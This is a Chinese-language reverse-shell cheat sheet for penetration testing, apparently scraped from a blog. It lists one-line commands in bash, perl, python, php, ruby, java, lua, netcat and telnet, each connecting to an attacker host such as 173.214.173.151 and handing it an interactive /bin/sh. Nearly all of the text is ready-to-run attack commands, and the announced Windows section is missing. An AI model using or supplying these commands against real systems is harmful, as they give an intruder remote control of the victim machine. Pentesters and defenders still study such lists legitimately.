简介
渗透测试过程中, 经常遇到WEB获取反弹shell、数据库获取反弹shell等场景, 本文记录诸位大佬们研究的反弹shell的技巧, 作为一个cheatsheet.
文章目录
- linux下创建反弹shell
- Windows下创建反弹shell
linux下反弹shell
1.上传反弹文件(脚本、木马)
2.bash1
$ /bin/bash -i >& /dev/tcp/<Attackip>/<Attackport> 0>&1
该命令在渗透测试中占据榜首多年, 是反弹 shell的首选命令, 但是在一些系统中无法成功运行, 目前在centos下实测过可正常反弹shell.
3.perl1
$ perl -e 'use Socket;$i="<Attackip>";$p=<Attackport>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl是linux系统中内置的解释器, 当bash命令无法反弹shell时, 优先选择该命令
4.python1
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Attackip>",<Attackport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
5.php1
$ php -r '$sock=fsockopen("<Attackip>",<Attackport>);exec("/bin/sh -i <&3 >&3 2>&3");'
6.ruby1
$ ruby -rsocket -e'f=TCPSocket.open("<Attackip>",<Attackport>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
7.java1
2
3r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
8.Lua:1
lua -e "require('socket');require('os');t=socket.tcp();t:connect('<Attackip>','<Attackport>');os.execute('/bin/sh -i <&3 >&3 2>&3');"
9.nc:1
2
3nc -e /bin/sh <Attackip> <Attackport>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Attackip> <Attackport> >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999
10.nc
1) 使用-e参数1
2
2) 不使用-e参数1
2
3
4
5# Victim
mknod /tmp/backpipe p
# Victim
/bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe
11.telnet1
2mknod backpipe p && telnet 173.214.173.151 8080 0<backpipe | /bin/bash 1>backpipe
telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888
